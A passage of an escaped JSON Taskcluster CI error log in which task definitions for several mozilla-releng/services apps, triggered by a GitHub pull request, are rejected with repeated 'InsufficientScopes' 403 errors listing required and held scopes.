   \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.360Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.360Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.360Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.610Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"CBYGBldpTCiQxYFOoL7tYQ\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_docs\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_docs\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_docs\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.360Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.360Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.360Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.610Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"CBYGBldpTCiQxYFOoL7tYQ\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"releng_docs\",\n                        \"description\": \"Test, build and deploy releng_docs\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/releng_docs\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"releng_docs\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 60,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/garbas/mozilla-releng-services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"4760569093551867dee0c25d0d820f1f9915a424\",\n                            \"GITHUB_HEAD_BRANCH\": \"trychooser\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-28T03:19:00.360Z\",\n                    \"deadline\": \"2016-09-29T03:19:00.360Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T5QTsoJ4Q4GRdGkWTeeS2A\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T03:19:00.360Z\"\n                },\n                \"time\": \"2016-09-28T03:19:00.610Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"YEXMFOReRF2im_WpPXwJtw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.361Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.361Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.361Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.621Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"YEXMFOReRF2im_WpPXwJtw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"shipit_dashboard\\\",\\n    \\\"description\\\": \\\"Test, build and deploy shipit_dashboard\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"shipit_dashboard\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.361Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.361Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.361Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.621Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"YEXMFOReRF2im_WpPXwJtw\"\n                },\n                \"payload\": {\n                    \"metadata\": {\n                        \"name\": \"shipit_dashboard\",\n                        \"description\": \"Test, build and deploy shipit_dashboard\",\n                        \"owner\": \"rok@garbas.si\",\n                        \"source\": \"https://github.com/mozilla-releng/services/tree/master/src/shipit_dashboard\"\n                    },\n                    \"scopes\": [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.*\",\n                                \"push\"\n                            ],\n                            \"branches\": [\n                                \"master\"\n                            ]\n                        }\n                    },\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"payload\": {\n                        \"maxRunTime\": 7200,\n                        \"image\": \"nixos/nix:latest\",\n                        \"features\": {\n                            \"taskclusterProxy\": true\n                        },\n                        \"env\": {\n                            \"APP\": \"shipit_dashboard\",\n                            \"TASKCLUSTER_SECRETS\": \"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\",\n                            \"GITHUB_EVENT\": \"pull_request.opened\",\n                            \"GITHUB_BRANCH\": \"master\",\n                            \"GITHUB_PULL_REQUEST\": 60,\n                            \"GITHUB_BASE_REPO_URL\": \"https://github.com/mozilla-releng/services.git\",\n                            \"GITHUB_BASE_USER\": \"mozilla-releng\",\n                            \"GITHUB_BASE_SHA\": \"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\",\n                            \"GITHUB_BASE_BRANCH\": \"master\",\n                            \"GITHUB_BASE_REF\": \"master\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/garbas/mozilla-releng-services.git\",\n                            \"GITHUB_HEAD_USER\": \"garbas\",\n                            \"GITHUB_HEAD_SHA\": \"4760569093551867dee0c25d0d820f1f9915a424\",\n                            \"GITHUB_HEAD_BRANCH\": \"trychooser\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"rok@garbas.si\"\n                        },\n                        \"command\": [\n                            \"/bin/bash\",\n                            \"-c\",\n                            \"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\"\n                        ]\n                    },\n                    \"created\": \"2016-09-28T03:19:00.361Z\",\n                    \"deadline\": \"2016-09-29T03:19:00.361Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"T5QTsoJ4Q4GRdGkWTeeS2A\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"routes\": [],\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T03:19:00.361Z\"\n                },\n                \"time\": \"2016-09-28T03:19:00.621Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"secrets:get:repo:github.com/mozilla-releng/services:branch:master\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-releng/services:pull-request\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:route:index.garbage.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UKplXhCrTQu5B2oJzyWZKw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": \\\"rok@garbas.si\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-releng/services/tree/master/src/releng_frontend\\\"\\n  },\\n  \\\"scopes\\\": [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.*\\\",\\n        \\\"push\\\"\\n      ],\\n      \\\"branches\\\": [\\n        \\\"master\\\"\\n      ]\\n    }\\n  },\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 7200,\\n    \\\"image\\\": \\\"nixos/nix:latest\\\",\\n    \\\"features\\\": {\\n      \\\"taskclusterProxy\\\": true\\n    },\\n    \\\"env\\\": {\\n      \\\"APP\\\": \\\"releng_frontend\\\",\\n      \\\"TASKCLUSTER_SECRETS\\\": \\\"taskcluster/secrets/v1/secret/repo:github.com/mozilla-releng/services:branch:master\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"pull_request.opened\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_PULL_REQUEST\\\": 60,\\n      \\\"GITHUB_BASE_REPO_URL\\\": \\\"https://github.com/mozilla-releng/services.git\\\",\\n      \\\"GITHUB_BASE_USER\\\": \\\"mozilla-releng\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"95815afcfc5c2871e7f7ed870e3238fc5a5fdc3e\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"master\\\",\\n      \\\"GITHUB_BASE_REF\\\": \\\"master\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/garbas/mozilla-releng-services.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"garbas\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4760569093551867dee0c25d0d820f1f9915a424\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"trychooser\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"rok@garbas.si\\\"\\n    },\\n    \\\"command\\\": [\\n      \\\"/bin/bash\\\",\\n      \\\"-c\\\",\\n      \\\"nix-env -iA nixpkgs.gnumake nixpkgs.curl && mkdir /src && cd /src && curl -L https://github.com/mozilla-releng/services/archive/$GITHUB_HEAD_SHA.tar.gz -o $GITHUB_HEAD_SHA.tar.gz && tar zxf $GITHUB_HEAD_SHA.tar.gz && cd services-$GITHUB_HEAD_SHA && ./.taskcluster.sh\\\"\\n    ]\\n  },\\n  \\\"created\\\": \\\"2016-09-28T03:19:00.360Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T03:19:00.360Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"T5QTsoJ4Q4GRdGkWTeeS2A\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"routes\\\": [],\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T03:19:00.360Z\\\"\\n}\\n  time:     2016-09-28T03:19:00.617Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-releng/services:pull-request\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"secrets:get:repo:github.com/mozilla-releng/services:branch:master\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"UKplXhCrTQu5B2oJzyWZKw\\\"}\\n  payload:  {\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"releng_frontend\\\",\\n    \\\"description\\\": \\\"Test, build and deploy releng_frontend\\\",\\n    \\\"owner\\\": 